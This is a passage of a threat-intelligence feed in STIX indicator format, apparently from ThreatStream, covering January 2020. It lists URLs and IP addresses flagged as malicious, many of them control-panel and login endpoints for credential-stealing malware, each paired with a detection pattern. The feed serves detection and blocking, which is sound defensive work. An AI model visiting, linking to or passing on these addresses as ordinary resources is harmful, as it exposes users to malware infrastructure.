CyberCrime","id":"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-22T03:00:45.841Z","name":"mal_url: http://smartlinktelecom.top/kings/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.841Z"} +{"created":"2020-01-22T03:00:45.959Z","description":"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--17777e7f-3e91-4446-a43d-79139de8a948","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-22T03:00:45.959Z","name":"mal_url: http://carirero.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://carirero.net/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.959Z"} +{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 74.116.84.20","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '74.116.84.20']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"} +{"created":"2020-01-22T03:00:57.729Z","description":"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b4fd8489-9589-4f70-996c-84989245a21b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-01-22T03:00:57.729Z","name":"mal_url: http://tuu.nu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tuu.nu/login']","type":"indicator","valid_from":"2020-01-22T03:00:57.729Z"} +{"created":"2020-01-22T03:01:02.696Z","description":"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime","id":"indicator--bc50c62f-a015-4460-87df-2137626877e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-01-22T03:01:02.696Z","name":"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.696Z"} +{"created":"2020-01-22T03:01:02.807Z","description":"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-22T03:01:02.807Z","name":"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.807Z"} +{"created":"2020-01-22T03:01:24.81Z","description":"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:01:24.81Z","name":"mal_url: http://nkpotu.xyz/Kpot1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']","type":"indicator","valid_from":"2020-01-22T03:01:24.81Z"} +{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 194.87.147.80","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.147.80']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"} +{"created":"2020-01-22T03:01:57.189Z","description":"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime","id":"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T03:01:57.189Z","name":"mal_url: http://35.158.92.3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://35.158.92.3/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:01:57.189Z"} +{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 45.95.168.70","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.95.168.70']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"} +{"created":"2020-01-22T03:02:50.57Z","description":"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--23215acb-4989-4434-ac6d-8f9367734f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:02:50.57Z","name":"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:02:50.57Z"} +{"created":"2020-01-22T03:02:52.496Z","description":"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-26"],"modified":"2020-01-22T03:02:52.496Z","name":"mal_url: http://f0391600.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391600.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:02:52.496Z"} +{"created":"2020-01-22T03:03:42.819Z","description":"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--10958d74-ec60-41af-a1ab-1613257e670f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-22T03:03:42.819Z","name":"mal_url: http://extraclick.space/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://extraclick.space/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:42.819Z"} +{"created":"2020-01-22T03:03:52.044Z","description":"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--19556daa-6293-400d-8706-d0baa6b16b7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:03:52.044Z","name":"mal_url: http://petrogarmani.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petrogarmani.pw/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:52.044Z"} +{"created":"2020-01-22T03:04:01.65Z","description":"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:04:01.65Z","name":"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:04:01.65Z"} +{"created":"2020-01-22T03:04:32.717Z","description":"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime","id":"indicator--43febf7d-4185-4a12-a868-e7be690b14aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-22T03:04:32.717Z","name":"mal_url: http://zanlma.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zanlma.com/login']","type":"indicator","valid_from":"2020-01-22T03:04:32.717Z"} +{"created":"2020-01-22T03:04:56.858Z","description":"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-22T03:04:56.858Z","name":"mal_url: http://f0369688.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0369688.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:04:56.858Z"} +{"created":"2020-01-22T03:04:59.245Z","description":"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:04:59.245Z","name":"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:04:59.245Z"} +{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.185.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} +{"created":"2020-01-23T03:01:11.329Z","description":"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-23T03:01:11.329Z","name":"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:01:11.329Z"} +{"created":"2020-01-23T03:01:36.682Z","description":"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-23T03:01:36.682Z","name":"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']","type":"indicator","valid_from":"2020-01-23T03:01:36.682Z"} +{"created":"2020-01-23T03:02:15.854Z","description":"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--27323b7d-85d3-4e89-8249-b7696925a772","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-23T03:02:15.854Z","name":"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:02:15.854Z"} +{"created":"2020-01-23T03:02:47.364Z","description":"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0639721-de55-48c6-b237-3859d61aecfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-23T03:02:47.364Z","name":"mal_url: http://f0392261.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0392261.xsph.ru/login']","type":"indicator","valid_from":"2020-01-23T03:02:47.364Z"} +{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: http://104.168.99.168/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.168/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} +{"created":"2020-01-23T03:03:15.734Z","description":"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-23T03:03:15.734Z","name":"mal_url: http://f0387404.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:15.734Z"} +{"created":"2020-01-23T03:03:42.599Z","description":"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-01-23T03:03:42.599Z","name":"mal_url: http://a0386457.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:42.599Z"} +{"created":"2020-01-24T02:57:04.821Z","description":"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-24T02:57:04.821Z","name":"mal_url: http://defenseisrael.com/dis/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://defenseisrael.com/dis/index.php']","type":"indicator","valid_from":"2020-01-24T02:57:04.821Z"} +{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 91.215.170.249","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.170.249']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} +{"created":"2020-01-24T02:57:04.883Z","description":"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-24T02:57:04.883Z","name":"mal_url: http://lbfb3f03.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:57:04.883Z"} +{"created":"2020-01-24T02:57:12.997Z","description":"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:12.997Z","name":"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:12.997Z"} +{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.28.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.28.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} +{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: http://217.8.117.51/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} +{"created":"2020-01-24T02:57:32.929Z","description":"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:32.929Z","name":"mal_url: http://lansome.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lansome.site/login']","type":"indicator","valid_from":"2020-01-24T02:57:32.929Z"} +{"created":"2020-01-24T02:57:49.028Z","description":"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e88008f4-76fc-428d-831a-4b389e48b712","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:49.028Z","name":"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:49.028Z"} +{"created":"2020-01-24T02:58:03.345Z","description":"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-24T02:58:03.345Z","name":"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:03.345Z"} +{"created":"2020-01-24T02:58:16.318Z","description":"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:58:16.318Z","name":"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.318Z"} +{"created":"2020-01-24T02:58:16.358Z","description":"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--4adabe80-3be4-401a-948a-f9724c872374","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-24T02:58:16.358Z","name":"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.358Z"} +{"created":"2020-01-24T02:58:32.126Z","description":"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:32.126Z","name":"mal_url: http://suspiciousactivity.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://suspiciousactivity.xyz/login']","type":"indicator","valid_from":"2020-01-24T02:58:32.126Z"} +{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://217.8.117.8/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.8/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} +{"created":"2020-01-24T02:58:37.643Z","description":"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--33e674f5-a64a-48f4-9d8c-248348356135","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-24T02:58:37.643Z","name":"mal_url: http://f0387550.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387550.xsph.ru/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.643Z"} +{"created":"2020-01-24T02:58:39.465Z","description":"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6311f539-1d5d-423f-a238-d0c1dc167432","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T02:58:39.465Z","name":"mal_url: http://lf4e4abf.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:58:39.465Z"} +{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 206.217.131.245","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '206.217.131.245']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} +{"created":"2020-01-24T02:59:15.878Z","description":"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-01-24T02:59:15.878Z","name":"mal_url: http://67.215.224.101/a1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.101/a1/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:15.878Z"} +{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 162.241.73.163","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.73.163']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} +{"created":"2020-01-24T02:59:50.233Z","description":"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--d5bdff38-6939-4a47-8e11-b910520565c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:50.233Z","name":"mal_url: http://l60bdd58.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:59:50.233Z"} +{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} +{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://5.188.60.52/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.52/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} +{"created":"2020-01-24T02:59:54.784Z","description":"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--504f4011-eaea-4921-aad5-f102bef7c798","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-24T02:59:54.784Z","name":"mal_url: http://trotdeiman.ga/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trotdeiman.ga/login']","type":"indicator","valid_from":"2020-01-24T02:59:54.784Z"} +{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 217.8.117.8","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.8']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} +{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 